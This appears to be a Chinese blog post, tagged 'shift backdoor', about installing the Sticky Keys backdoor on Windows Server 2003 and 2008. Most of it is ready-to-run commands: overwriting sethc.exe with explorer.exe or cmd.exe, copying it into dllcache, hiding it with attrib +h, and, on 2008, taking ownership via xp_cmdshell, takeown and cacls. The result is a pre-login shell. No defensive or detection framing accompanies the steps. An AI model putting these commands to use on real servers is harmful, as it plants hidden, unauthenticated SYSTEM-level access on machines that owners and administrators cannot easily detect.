标签归档:shift后门

Windows服务器安装shift后门

Windows2003


通过远程桌面连接工具连接到Windows远程桌面,在没有输入用户名和密码前,连接按5次Shift键,可以调用c:\windows\system32\sethc.exe,所以需要把c:\windows\system32\sethc.exe替换成其他的执行程序。
例如这里我调用资源管理器,安装方式如下:

copy c:\windows\explorer.exe c:\windows\system32\sethc.exe /y
copy c:\windows\system32\sethc.exe c:\windows\system32\dllcache\sethc.exe /y
attrib c:\windows\system32\sethc.exe +h
attrib c:\windows\system32\dllcache\sethc.exe +h

其中attrib +h是添加隐藏属性

 

Windows2008


windows 2008中对于权限设置的比较严格,例如我们通过xp_cmdshell直接替换sethc.exe是没有权限的。如图所示:

exec xp_cmdshell 'copy c:\windows\system32\cmd.exe c:\windows\system32\sethc.exe /y'

将权限目录下的所有文件及文件夹、子文件夹下的所有者更改为管理员组(administrators)命令

exec xp_cmdshell 'takeown /f c:\windows\system32\sethc.* /a /r /d y'

赋予SYSTEM完全控制权限
cacls c:\windows\system32\sethc.exe /T /E /G system:F

然后就可以复制了

通过shift后门调出DOS窗口

不过windows 2008下如果是用explorer.exe替换无法调用出资源管理窗口。